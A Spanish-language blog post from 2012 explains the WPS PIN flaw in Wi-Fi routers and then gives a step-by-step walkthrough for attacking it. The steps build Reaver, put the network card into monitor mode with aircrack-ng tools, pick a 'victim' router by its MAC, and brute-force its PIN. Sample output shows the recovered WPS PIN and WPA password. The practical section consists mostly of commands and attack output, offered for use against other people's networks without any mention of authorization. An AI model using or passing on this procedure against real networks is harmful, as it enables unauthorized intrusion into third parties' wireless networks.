Buscar este blog

sábado, 7 de enero de 2012

vulnerabilidad en el estándar WPS (Wi-Fi Protected Setup) hack wpa2




Como vimos en la anterior entrada se ha descubierto una vulnerabilidad en el estándar WPS (Wi-Fi Protected
Setup) que podría comprometer la robustez del PIN.

Wi-Fi Protected Setup, o WPS por sus siglas, es un estándar incluido
en muchos routers y dispositivos wifi que facilita a los usuarios la
creación de redes inalámbricas seguras. Dicho estándar dispone de
varios métodos para agregar dispositivos a una red:
* a través de un número PIN de 8 dígitos
* pulsando un botón de configuración (PBC o Push Button Configuration)
* mediante NFC (Near-Field Communication) acercando los dispositivos al
punto de acceso o router
* utilizando una llave USB que almacena los datos de la configuración

El estándar WPS lo implementan productos de fabricantes como Cisco,
Technicolor, TP-Link, ZyXEL, D-Link, Netgear, Linksys, y Buffalo, entre
otros muchos.

Vamos a ver un ejemplo practico:

Lo primero sera bajar el software

http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz

Una vez situados en la carpeta donde descargamos reaver lo descomprimiremos:

root@th2:/home/leviatan/Descargas# tar -xf reaver-1.3.tar.gz
root@th2:/home/leviatan/Descargas# cd reaver-1.3
root@th2:/home/leviatan/Descargas/reaver-1.3# cd src/
root@th2:/home/leviatan/Descargas/reaver-1.3/src# make
root@th2:/home/leviatan/Descargas/reaver-1.3/src# make install

con esto habremos compilado e instalado el software y sta listo para utilizar...

nos ayudaremos para monitorizar las redes y poner en modo monitor la targeta de red nuestra las herramientas de Aircrack-ng

root@th2:~# airmon-ng check kill (esto parara todos los procesos que estorban a aircrack)
root@th2:~# airmon-ng start wlan0 (ponemos la targeta en modo monitor)
obtendremos esta respuesta:

Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)


root@th2:~# airodump-ng mon0 (monitoreamos la redes)

Seleccionaremos nuestra victima teniendo en cuenta que para que el ataque tenga exito el router tiene que tener la opcion WPS abilitada (la mayoria lo traen por defecto)

y ahora ejecutamos el comando

reaver -i mon0 -b 00:00:00:00:00:00 -vv (poniendo la mac de la victima claro)

y a esperar:

trying 00000000
attempt took 0.95 seconds
trying 00010009
attempt took 1.28 seconds
trying 00020008
attempt took 1.03 seconds
Key cracked in 483 seconds
[+] WPS PIN: '31681278'
[+] WPA PSK: 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
[+] AP SSID: 'xx xxxxxxxa'

Reaver ha sido diseñado para ser un ataque sólido y práctico contra la WPS, y ha sido probado contra una amplia variedad de puntos de acceso y las distintas implementaciones de WPS. En promedio Reaver recuperará la clave WPA/WPA2 en texto plano del AP objetivo y su contraseña en un promedio de 4 a 10 horas, dependiendo del AP. En la práctica, por lo general, se llevará la mitad de este tiempo en encontrar el PIN WPS corregir y recuperar la contraseña.

leer mas
http://www.tacnetsol.com/products/

No hay comentarios:

Publicar un comentario